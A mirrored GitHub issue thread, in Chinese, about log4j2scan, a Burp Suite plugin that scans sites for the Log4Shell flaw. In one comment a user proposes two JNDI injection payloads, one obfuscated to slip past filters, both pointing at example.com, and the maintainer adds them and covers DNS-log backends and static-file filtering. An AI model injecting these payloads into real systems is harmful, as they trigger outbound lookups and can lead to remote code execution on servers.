Giter VIP home page Giter VIP logo

Comments (9)

whwlsfb avatar whwlsfb commented on August 22, 2024

下个版本将会加入

from log4j2scan.

whwlsfb avatar whwlsfb commented on August 22, 2024

master分支支持多poc的代码已提交,可以先下载源码本地编译测试,预编译版明天发布

from log4j2scan.

kaka77 avatar kaka77 commented on August 22, 2024

建议增加: cloudflare 捕获到的攻击载荷及绕过:

${jndi:dns://aeutbj.example.com/ext}

${jndi:${lower:l}${lower:d}a${lower:p}://example.com/

from log4j2scan.

Oldman19 avatar Oldman19 commented on August 22, 2024

master分支支持多poc的代码已提交,可以先下载源码本地编译测试,预编译版明天发布

顺便把dnslog。cn换成bp自带的呗,bp自带的更好用呀

from log4j2scan.

whwlsfb avatar whwlsfb commented on August 22, 2024

master分支支持多poc的代码已提交,可以先下载源码本地编译测试,预编译版明天发布

顺便把dnslog。cn换成bp自带的呗,bp自带的更好用呀

bp自带测试过了,也是延迟严重,如果不信邪代码里也有BP dnslog的兼容层,你可以下载源码改下测试。

修改方法是将Log4j2Scanner.java 里的this.dnslog = new DnslogCN();改成this.dnslog = new BurpCollaborator();,然后重新打包编译。

from log4j2scan.

whwlsfb avatar whwlsfb commented on August 22, 2024

建议增加: cloudflare 捕获到的攻击载荷及绕过:

${jndi:dns://aeutbj.example.com/ext}

${jndi:${lower:l}${lower:d}a${lower:p}://example.com/

感谢,已添加至源码库,由于现在poc变种太多,为了降低网络压力,默认只启用POC1、POC2、POC3、POC4。

from log4j2scan.

Oldman19 avatar Oldman19 commented on August 22, 2024

master分支支持多poc的代码已提交,可以先下载源码本地编译测试,预编译版明天发布

顺便把dnslog。cn换成bp自带的呗,bp自带的更好用呀

bp自带测试过了,也是延迟严重,如果不信邪代码里也有BP dnslog的兼容层,你可以下载源码改下测试。

修改方法是将Log4j2Scanner.java 里的this.dnslog = new DnslogCN();改成this.dnslog = new BurpCollaborator();,然后重新打包编译。

是有延迟,刚才在使用过程中发现插件对js和css文件也攻击,个人感觉没必要吧,就一些增删改查的位置会记录日志,再加上js文件和css文件那么多,一个站就被动扫非常久。

from log4j2scan.

whwlsfb avatar whwlsfb commented on August 22, 2024

master分支支持多poc的代码已提交,可以先下载源码本地编译测试,预编译版明天发布

顺便把dnslog。cn换成bp自带的呗,bp自带的更好用呀

bp自带测试过了,也是延迟严重,如果不信邪代码里也有BP dnslog的兼容层,你可以下载源码改下测试。
修改方法是将Log4j2Scanner.java 里的this.dnslog = new DnslogCN();改成this.dnslog = new BurpCollaborator();,然后重新打包编译。

是有延迟,刚才在使用过程中发现插件对js和css文件也攻击,个人感觉没必要吧,就一些增删改查的位置会记录日志,再加上js文件和css文件那么多,一个站就被动扫非常久。

新代码已经过滤了静态文件

from log4j2scan.

whwlsfb avatar whwlsfb commented on August 22, 2024

v0.6版本已加入多poc支持。

from log4j2scan.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.